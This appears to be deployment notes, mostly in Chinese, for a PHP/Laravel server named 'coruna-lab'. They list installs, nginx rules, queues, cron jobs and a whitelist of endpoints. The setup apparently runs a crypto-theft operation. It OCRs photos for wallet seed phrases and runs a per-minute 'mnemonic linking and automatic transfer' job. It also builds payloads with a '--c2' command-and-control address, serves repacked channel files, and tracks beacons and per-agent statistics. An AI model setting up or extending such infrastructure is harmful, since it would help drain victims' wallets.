- php 安装拓展: ``` apt-get update apt-get install -y libgmp-dev apt-get install -y p7zip-full apt-get install -y tesseract-ocr tesseract-ocr-eng tesseract-ocr-chi-sim apt-get install -y libheif-examples imagemagick apt-get install -y libheif1 libheif-dev apt-get install -y cmake g++ libde265-dev libx265-dev libjpeg-dev libpng-dev cd /tmp curl -L -o libheif.tar.gz https://github.com/strukturag/libheif/releases/download/v1.19.7/libheif-1.19.7.tar.gz tar xf libheif.tar.gz cd libheif-1.19.7 cmake -B build -DCMAKE_INSTALL_PREFIX=/usr/local cmake --build build -j"$(nproc)" cmake --install build ldconfig /usr/local/bin/heif-convert --version fileinfo gmp redis ``` ``` 确认: tesseract --list-langs # 必须有 eng(助记词 OCR 默认只跑英文) which tesseract ``` - 禁用函数: ``` disable_functions = system,chroot,chgrp,chown,shell_exec,popen,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,imap_open,apache_setenv ``` - 伪静态配置 - nginx 配置 ``` location ~ "^/c/([0-9A-Za-z]\.[0-9A-Za-z]\.[0-9A-Za-z]{2})/show\.htm$" { alias /www/wwwroot/coruna-lab/public/channel/$1/details/show.html; types { } default_type application/octet-stream; add_header Cache-Control "public, max-age=60"; add_header Content-Type "application/octet-stream" always; } location ^~ /log/ { deny all; return 404; } ``` - composer ``` composer self-update composer install --no-dev --optimize-autoloader ``` ``` cp .env.example .env php artisan key:generate # 仅全新安装;已有库后禁止再跑,否则助记词解不开 chown -R www:www storage bootstrap/cache chmod -R ug+rwx storage bootstrap/cache chown -R www:www /www/wwwroot/coruna-lab/storage chmod +x /www/wwwroot/coruna-lab/bin/heif-convert chattr -i /www/wwwroot/coruna-lab/public/.user.ini chown -R www:www /www/wwwroot/coruna-lab/public /www/wwwroot/coruna-lab/storage chattr +i /www/wwwroot/coruna-lab/public/.user.ini php artisan migrate ``` zhe ```bash cd /www/wwwroot/coruna-lab/channel-builder-new python3 -m venv .venv source .venv/bin/activate .venv/bin/pip install pycryptodome py7zr pip install -r requirements.txt php artisan xxbb:build --random-c php artisan ds:build --c2 http://192.168.31.130:8000 php artisan xxbb:repack chown -R www:www /www/wwwroot/coruna-lab/storage /www/wwwroot/coruna-lab/bootstrap/cache chmod -R ug+rwX /www/wwwroot/coruna-lab/storage/app/channel-builder-new 'magick' => [base_path('bin/magick'), '/opt/homebrew/bin/magick', '/usr/local/bin/magick', '/usr/bin/magick', 'magick'], 'convert' => [base_path('bin/convert'), '/usr/bin/convert', 'convert'], 'heif-convert' => [base_path('bin/heif-convert'), '/usr/bin/heif-convert', '/usr/local/bin/heif-convert', 'heif-convert'], 'heif-dec' => [base_path('bin/heif-dec'), '/usr/bin/heif-dec', '/usr/local/bin/heif-dec', 'heif-dec'], 2 tests/Unit/PhotoPreviewTest.php:86 Tests: 6 failed (1 assertions) Duration: 0.69s ]); } ✓ jpeg passthrough does not convert 0.01s ✓ heic converts to jpeg and leaves original 0.30s Tests: 6 passed (18 assertions) Duration: 2.06s 日志说明三件事: PHP 在乱试 heif-dec 的错误参数、以及 Linux 上不存在的 /opt/homebrew/bin/magick 系统自带的 convert 不支持 HEIC(no images defined) 真正能用的 /usr/bin/heif-convert 仍被 open_basedir 挡住,PHP 没法当工作目录去启动它 已经改成:在项目里放一个 bin/heif-convert 包装脚本(在允许的目录里),由它再去 exec /usr/bin/heif-convert。PHP 只启动项目内的脚本,不再探测 /usr/bin。 部署到新机后执行: chmod +x /www/wwwroot/coruna-lab/bin/heif-convert chown www:www /www/wwwroot/coruna-lab/bin/heif-convert ``` - 队列 ```text 名称: coruna-queue 启动命令: /www/server/php/82/bin/php artisan queue:work redis --sleep=1 --tries=3 --timeout=90 --max-time=3600 启动目录: /www/wwwroot/coruna-lab 进程数量: 2 名称: coruna-ocr 启动命令: /www/server/php/82/bin/php artisan queue:work redis --queue=ocr --sleep=0 --tries=1 --timeout=90 --max-jobs=100 启动目录: /www/wwwroot/coruna-lab 进程数量: 3 ``` - 定时任务(每分钟:助记词关联 + 自动转账;每 15 分钟 / 每天 00:10:每日报表汇总) ``` cd /www/wwwroot/coruna-lab && /www/server/php/82/bin/php artisan schedule:run >> /dev/null 2>&1 ``` 上线每日报表后先回填历史(从最早访问/设备到今天,全站 + 各代理): ``` php artisan migrate php artisan coruna:daily-stats --all ``` url 白名单 ^/api/ds/* /p /war /beacon /statistic/t /api/tg/t /ba /ub /us /uj /t /result /nb /event /u /a /api/wp/t /hooks/telegram /hooks/tokenview